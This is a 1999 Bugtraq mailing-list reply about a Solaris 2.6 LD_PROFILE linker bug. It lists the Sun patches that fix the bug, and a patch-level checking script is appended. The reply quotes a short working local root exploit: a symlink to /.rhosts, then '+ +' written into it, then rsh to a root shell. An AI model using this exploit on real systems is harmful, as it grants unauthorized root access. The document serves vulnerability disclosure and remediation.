[11993] in bugtraq


Re: LD_PROFILE local root exploit for solaris 2.6

daemon@ATHENA.MIT.EDU (Casper Dik)
Sun Sep 26 02:14:18 1999

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id:  <199909240830.KAA12231@romulus>
Date:         Fri, 24 Sep 1999 10:30:32 +0200
Reply-To: Casper Dik <casper@HOLLAND.SUN.COM>
From: Casper Dik <casper@HOLLAND.SUN.COM>
X-To:         Steve Mynott <steve@TIGHTROPE.DEMON.CO.UK>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  Your message of "Wed, 22 Sep 1999 21:14:40 -0000." 
              <19990922211439.A654@tightrope.demon.co.uk>

>works on solaris 2.6 sparc anyway...
>
>#! /bin/ksh
>#  LD_PROFILE local root exploit for solaris
>#  steve@tightrope.demon.co.uk 19990922
>umask 000
>ln -s /.rhosts /var/tmp/ps.profile
>export LD_PROFILE=/usr/bin/ps
>/usr/bin/ps
>echo + + >  /.rhosts
>rsh -l root localhost csh -i


This is bug 4150646 (or rather, 1241843, which resurfaced after an
extensive rewrite of the dynamic linker).

It's been fixed in Solaris 7 and with the following patches in other
releases:

103242-07: SunOS 5.5: linker patch
103243-07: SunOS 5.5_x86: linker patch
103627-11: SunOS 5.5.1: Linker patch
103628-10: SunOS 5.5.1_x86: Linker patch
105490-07: SunOS 5.6: linker patch
105491-05: SunOS 5.6_x86: linker patch


The bug was originally fixed in 5.5.1 and back patched; I rediscovered that
it was back in 2.6 (which also meant it was in the process of being patched
back into 5.5/5.5.1, but I think those patches were held up until the
regression was fixed); this was all well before S7 was released.

The original bug was also fixed in the following patches:

102049-05: SunOS 5.4: linker fixes
102303-05: SunOS 5.4: POINT PATCH: linker fixes
102304-05: SunOS 5.4_x86: POINT PATCH: linker fixes
102778-03: SunOS 5.4_x86: linker patch


Casper
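As an added example (not part of Casper's post or Sun's tooling), the following POSIX sh snippet checks whether a host carries at least the linker patch revision listed above for its release, by parsing the `Patch: NNNNNN-RR ...` lines that `showrev -p` prints. The release names follow the post's own labels (e.g. `5.6_x86`), and the sample `showrev -p` output embedded below is constructed.

```sh
#!/bin/sh
# Added example: verify the linker patch level against the revisions listed in the post.
# Assumes `showrev -p` output of the form
# "Patch: 105490-07 Obsoletes: ... Requires: ... Incompatibles: ... Packages: ...".

# Minimum linker patch per release, taken from the post.
required_patch() {
  case "$1" in
    5.5)       echo 103242-07 ;;
    5.5_x86)   echo 103243-07 ;;
    5.5.1)     echo 103627-11 ;;
    5.5.1_x86) echo 103628-10 ;;
    5.6)       echo 105490-07 ;;
    5.6_x86)   echo 105491-05 ;;
    *)         return 1 ;;
  esac
}

# Constructed sample of `showrev -p` output for a 5.6 SPARC host carrying an
# older revision of the linker patch (105490-05) plus an unrelated patch.
SAMPLE_SHOWREV='Patch: 105181-11 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu, SUNWcsr
Patch: 105490-05 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu'

# linker_patch_ok RELEASE SHOWREV_OUTPUT
# Returns 0 when an installed revision of the required patch base ID is at least
# the required revision, 1 when it is missing or too old, 2 for an unknown release.
# Only the -RR revision is compared numerically; the base ID must match exactly.
linker_patch_ok() {
  req=$(required_patch "$1") || { echo "unknown release: $1" >&2; return 2; }
  base=${req%-*}
  minrev=${req#*-}
  # Highest installed revision of the base patch ID, empty if none is installed.
  have=$(printf '%s\n' "$2" |
    awk -v b="$base" '$1 == "Patch:" && index($2, b "-") == 1 { split($2, a, "-"); print a[2] }' |
    sort -n | tail -1)
  if [ -n "$have" ] && [ "$have" -ge "$minrev" ]; then
    echo "OK: $base-$have installed (need >= $req)"
    return 0
  fi
  found=${have:+$base-$have}
  echo "VULNERABLE: need $req, found ${found:-none}"
  return 1
}
```

On a live host the second argument would be `"$(showrev -p)"` and the first the release from `uname -r`, with the `_x86` suffix added for x86 systems.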
